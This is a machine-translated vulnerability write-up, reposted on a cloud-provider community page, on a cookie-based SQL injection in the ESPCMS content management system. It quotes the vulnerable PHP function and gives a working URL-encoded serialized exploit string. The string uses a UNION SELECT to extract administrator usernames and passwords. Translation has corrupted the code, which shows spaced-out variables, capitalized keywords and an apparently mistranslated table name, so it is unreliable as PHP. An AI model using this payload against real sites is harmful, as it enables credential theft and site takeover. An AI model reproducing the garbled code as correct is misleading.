ESPCMS latest cookie Injection Vulnerability Analysis

Source: Internet
Author: User

0 × 00Introduction:
Yisi ESPCMS is an enterprise website management system built based on LAMP. It is easy to operate, powerful, stable, scalable, and secure, and convenient for secondary development and post-maintenance, it helps you quickly and easily build a powerful and professional enterprise website.
0 × 01Vulnerability Analysis:
Function in_list (){
Parent: start_pagetemplate ();
$ Lng = (admin_LNG = 'big5 ')? $ This-> CON ['is _ lancode']: admin_LNG;
$ Cartid = $ this-> fun-> accept ('ecisp _ order_list ', 'C'); // receives cookies ['ecisp _ order_list']
$ Cartid = stripslashes (htmlspecialchars_decode ($ cartid ));
$ Uncartid =! Empty ($ cartid )? Unserialize ($ cartid): 0; // $ cartid has special format requirements
If ($ uncartid & is_array ($ uncartid )){
$ Didarray = $ this-> fun-> key_array_name ($ uncartid, 'did', 'amount ');
$ Didlist = $ this-> fun-> format_array_text (array_keys ($ didarray ),',');
If (! Empty ($ didlist )){
$ Db_table = db_prefix. 'document ';
$ Db_where = "isclass = 1 AND isorder = 1 AND did in ($ didlist) order by did DESC ";
$ SQL = "SELECT did, lng, pid, mid, aid, tid, sid, fgid, linkdid, isclass, islink, ishtml, ismess, isorder, purview, recommend, tsn, title, longtitle, color, author, source, pic, link, oprice, bprice, click, addtime, template, filename, filepath FROM $ db_table WHERE $ db_where "; // dynamically construct SQL statements
$ Rs = $ this-> db-> query ($ SQL); // directly bring in the query to directly obtain the value of cookies ['ecisp _ order_list '] without filtering, it is directly used to construct an SQL statement and bring it into the query. Therefore, a cookie injection is formed here.
0 × 02Difficulties:
The received cookies ['ecisp _ order_list '] are transmitted through htmlspecialchars_decode (), stripslashes (), unserialize (), key_array_name (), and array_keys () and format_array_text () functions.
Stripslashes () allows injection statements to ignore the impact of GPC.
However, the use of unserialize () makes it more difficult to construct exp. Because the value of unserialize () is passed in, a specified special format must be used (in implementation, I have not completely understood this special format)
I successfully constructed exp by luck and a little skill. I will not elaborate on it here. You can print the return values of several functions to find the construction method. (Or, you can use the exp below to find some rules)
0 × 03 EXP:
A % 3a1% 3a % 7bs % 3a3% 3a % 22k23% 22% 3ba % 3a2% 3a % 7bs % 3a3% 3a % 22did % 22% 3bs % 3a159% 3a % 2224) + and + 1% 3d2 + union + select + 1% 2c2% 2c3% 2c4% 2c5% 2c6% 2c7% 2c8% 2c9% 2c10% 2c11% 2c12% 2c13% 2c14% 2c15% 2c16% 2 cpassword % 2 cusername % 2c19% 2c20% 2c21% 2c22% 2c23% 2c24% 2c25% 2c26% 2c27% 2c28% 2c29% 2c30% 2c31 + from + sources + where + 1 + in + (1% 22% 3bs % 3a6% 3a % 22 amount % 22% 3bi % 3a1% 3b % 7d % 7d0 × 04Usage:
As we all know, in order to prevent the use of exp from being too low (in fact, it is already very low), we will not show the utilization process one by one.
0 × 05Demo:
Inject to get administrator information:

Official Background:



 
0 × 06Ad Time:
Long term draft of Taoyuan magazine, mail: lovelessyuyu353@qq.com
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.